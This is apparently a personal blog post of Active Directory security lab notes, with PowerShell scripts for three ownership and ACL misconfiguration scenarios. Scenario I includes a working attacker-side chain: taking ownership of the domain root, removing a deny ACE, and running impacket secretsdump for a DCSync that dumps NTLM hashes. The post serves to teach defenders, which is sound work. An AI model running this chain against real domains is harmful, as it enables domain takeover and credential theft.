Back to the Basics; Ownership Matters

  • Scenario I: an odd mashup of AD privileges on the domain root
  • Scenario II: a junior sysadmin screws up an OU by becoming its owner
  • Scenario III: a section FUBARs the ACL on its own data share
  • A user has been placed in two groups: GroupX and GroupY.
  • GroupX has been denied ExtendedRight (with an all-zero ObjectType GUID, i.e. every extended right, including the DS-Replication ones DCSync needs) and WriteDACL on the domain root.
  • GroupY has been allowed GenericAll (Full Control) on the domain root. GenericAll includes WriteOwner, and nothing denies WriteOwner — that gap, plus the implicit WRITE_DAC an owner always has, is what the lab exercises.
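# Scenario I lab setup (presumably run as a Domain Admin): build the "odd mashup"
# of domain-root ACEs that the "Insider" account will later abuse.
#   GroupX: DENY ExtendedRight (ObjectType = all-zero GUID) and DENY WriteDACL
#   GroupY: ALLOW GenericAll
#   Insider is a member of both groups.
# An all-zero ObjectType GUID on an ExtendedRight ACE means the ACE covers every
# extended right on the object, including the DS-Replication-Get-Changes* rights
# a DCSync needs (see http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm).
# NOTE(review): GenericAll includes WriteOwner and nothing below denies it; that
# gap is the point of the exercise, not an oversight to fix here.
Import-Module ActiveDirectory
Set-Location AD:

$domainDn  = 'dc=corp,dc=local'
$ouPath    = 'ou=user accounts,dc=corp,dc=local'
$emptyGuid = [guid]::Empty   # all-zero GUID: "any object type" / "any inherited class"

# Lab placeholder account: no password, not enabled (New-ADUser default).
New-ADUser -DisplayName 'Malicious Insider' -SamAccountName 'Insider' -UserPrincipalName 'Insider@corp.local' -Path $ouPath

New-ADGroup -GroupScope Global -GroupCategory Security -Name 'GroupX' -Path $ouPath -DisplayName 'GroupX' -SamAccountName 'GroupX'
New-ADGroup -GroupScope Global -GroupCategory Security -Name 'GroupY' -Path $ouPath -DisplayName 'GroupY' -SamAccountName 'GroupY'

# Adds one ACE for a group to the domain-root DACL and writes it back right away,
# so each ACE is applied as its own change (mirrors the original step-by-step flow).
function Add-DomainRootAce {
    param(
        [Parameter(Mandatory)] [string] $GroupName,
        [Parameter(Mandatory)] [System.DirectoryServices.ActiveDirectoryRights] $Rights,
        [Parameter(Mandatory)] [System.Security.AccessControl.AccessControlType] $Type
    )
    $acl = Get-Acl "AD:\$domainDn"
    # Get-ADGroup already returns a SecurityIdentifier; no need to re-wrap it.
    $sid = (Get-ADGroup -Identity $GroupName).SID
    # Ctor: (identity, rights, type, objectType, inheritance, inheritedObjectType).
    # The GUIDs must be real GUID values -- an en-dash in the literal (a copy/paste
    # artifact) makes [guid] parsing fail, hence [guid]::Empty instead of a string.
    $ace = New-Object -TypeName System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $sid, $Rights, $Type, $emptyGuid, 'None', $emptyGuid
    $acl.AddAccessRule($ace)
    Set-Acl "AD:\$domainDn" $acl
}

# GroupX: Deny ExtendedRight (all extended rights) and Deny WriteDACL.
Add-DomainRootAce -GroupName 'GroupX' -Rights 'ExtendedRight' -Type 'Deny'
Add-DomainRootAce -GroupName 'GroupX' -Rights 'WriteDacl'     -Type 'Deny'
# GroupY: Allow GenericAll (Full Control).
Add-DomainRootAce -GroupName 'GroupY' -Rights 'GenericAll'    -Type 'Allow'

Add-ADGroupMember -Identity 'GroupX' -Members 'Insider'
Add-ADGroupMember -Identity 'GroupY' -Members 'Insider'

# Verify: list the domain-root ACEs that reference either lab group ...
(Get-Acl (Get-ADDomain).DistinguishedName).Access |
    Where-Object { ($_.IdentityReference -like '*GroupX*') -or ($_.IdentityReference -like '*GroupY*') }
# ... and show the current owner of the domain root. The split drops the "DOMAIN\"
# prefix; Get-ADGroup is used because the owner is expected to resolve to a group
# here -- if it resolves to a user instead, use Get-ADUser.
$ownerName = ((Get-Acl (Get-ADDomain).DistinguishedName).Owner).Split('\')[1]
Get-ADGroup -Identity $ownerName | Select-Object SID, Name, DistinguishedName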
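# Scenario I, attacker side (run in Insider's context).
# GroupY's GenericAll includes WriteOwner, and the GroupX deny ACEs cover only
# ExtendedRight and WriteDACL, so Insider can still take ownership of the domain
# root. An object's owner holds READ_CONTROL and WRITE_DAC implicitly, regardless
# of the DACL -- the explicit Deny WriteDACL does not stop the owner from
# rewriting the DACL. That is why step 2 below succeeds.
Import-Module ActiveDirectory
Set-Location AD:

$domainDn  = 'dc=corp,dc=local'
$emptyGuid = [guid]::Empty

# Step 1: become the owner of the domain root (WriteOwner, via GenericAll).
# Without SeRestorePrivilege the only owner a principal can set is itself (or a
# group in its token), which is exactly what is done here.
$acl = Get-Acl "AD:\$domainDn"
$acl.SetOwner((Get-ADUser -Identity 'Insider').SID)
Set-Acl "AD:\$domainDn" $acl

# Step 2: as owner, drop the Deny ExtendedRight ACE on GroupX. Once it is gone,
# GroupY's GenericAll grants the DS-Replication-Get-Changes* extended rights, i.e.
# DCSync (http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm).
# The rule must match the deny ACE exactly, including both GUIDs -- a copy/paste
# en-dash in the GUID literal would fail to parse, so [guid]::Empty is used.
$acl = Get-Acl "AD:\$domainDn"
$groupXSid    = (Get-ADGroup -Identity 'GroupX').SID
$denyExtended = New-Object -TypeName System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $groupXSid, 'ExtendedRight', 'Deny', $emptyGuid, 'None', $emptyGuid
# RemoveAccessRule returns $false when no matching ACE exists; surface that rather
# than writing back an unchanged DACL and assuming the deny is gone.
if (-not $acl.RemoveAccessRule($denyExtended)) {
    throw "Deny ExtendedRight ACE for GroupX not found on $domainDn"
}
Set-Acl "AD:\$domainDn" $acl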
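# DCSync from Kali with impacket once the deny ACE is gone. -just-dc-ntlm pulls
# only the NTLM hashes via DRSUAPI replication, which needs the DS-Replication
# extended rights on the domain root. The password is prompted for interactively;
# don't put it on the command line, it would land in shell history and `ps`.
# Assumes the Insider account has been enabled with a known password (the lab
# setup creates it as a placeholder) -- confirm before running.
cd /home/kali/Downloads/impacket-master/examples || exit 1
python3 secretsdump.py -just-dc-ntlm corp/insider@192.168.0.110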
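# Scenario II lab: a junior sysadmin account ("mishka") ends up as owner of an OU.
# Don't bother setting firstname/lastname/pwd or enabling the users. They're just
# placeholders for a lab.
Import-Module ActiveDirectory

$vipOu = 'ou=VIPs,dc=test,dc=local'
New-ADOrganizationalUnit -Name 'VIPs' -Path 'dc=test,dc=local'
foreach ($name in 'CEO', 'CIO', 'CISO', 'SomeOverPaidVIP') {
    New-ADUser -DisplayName $name -Name $name -SamAccountName $name -UserPrincipalName "$name@test.local" -Path $vipOu
}

Set-Location AD:
# The screw-up: hand OU ownership to a non-admin account. An owner has WRITE_DAC
# on the object implicitly, so mishka can now rewrite the OU's DACL (and, via
# inheritance, reach every VIP account under it) no matter what the DACL says.
$acl = Get-Acl "AD:\$vipOu"
$acl.SetOwner((Get-ADUser -Identity 'mishka').SID)
Set-Acl "AD:\$vipOu" $acl

# The fix: copy the security descriptor of a known-good OU onto VIPs.
# Caveats: Get-Acl returns the whole descriptor (owner, explicit ACEs and the
# inheritance-protection flag), and Set-Acl presumably writes all of it back --
# inherited ACEs are recomputed from the VIPs parent, not copied. Review the
# source OU's explicit ACEs first (they may not suit VIPs), and confirm the
# result with (Get-Acl "AD:\$vipOu").Owner and .Access afterwards.
$KnownGood = Get-Acl -Path 'AD:\ou=user accounts,dc=test,dc=local'
Set-Acl -Path "AD:\$vipOu" -AclObject $KnownGood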
# Scenario III lab: a share whose permissions the owning section then mangles.
$sharePath = 'C:\Temp\Share'
New-Item -ItemType Directory -Path $sharePath
Add-Content -Path "$sharePath\SuperSecretSquirrelStuff.txt" -Value 'Be careful with this stuff!'

# Share-level permissions: the section's group gets Full, and Everyone gets Read
# on a share that holds the "secret" file.
$shareParams = @{
    Name       = 'Share'
    Path       = $sharePath
    FullAccess = 'test\Minions'
    ReadAccess = 'Everyone'
}
New-SmbShare @shareParams
Grant-SmbShareAccess -Name 'Share' -AccountName 'test\Domain Admins' -AccessRight Full -Force

# Set-SmbPathAcl copies the share ACL onto the folder's NTFS ACL, so Minions end
# up with Full Control on the file system as well (including the right to change
# permissions and take ownership) and Everyone gets Read at the NTFS level too.
Set-SmbPathAcl -ShareName 'Share'
Get-SmbShareAccess -Name 'Share'

Rich

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.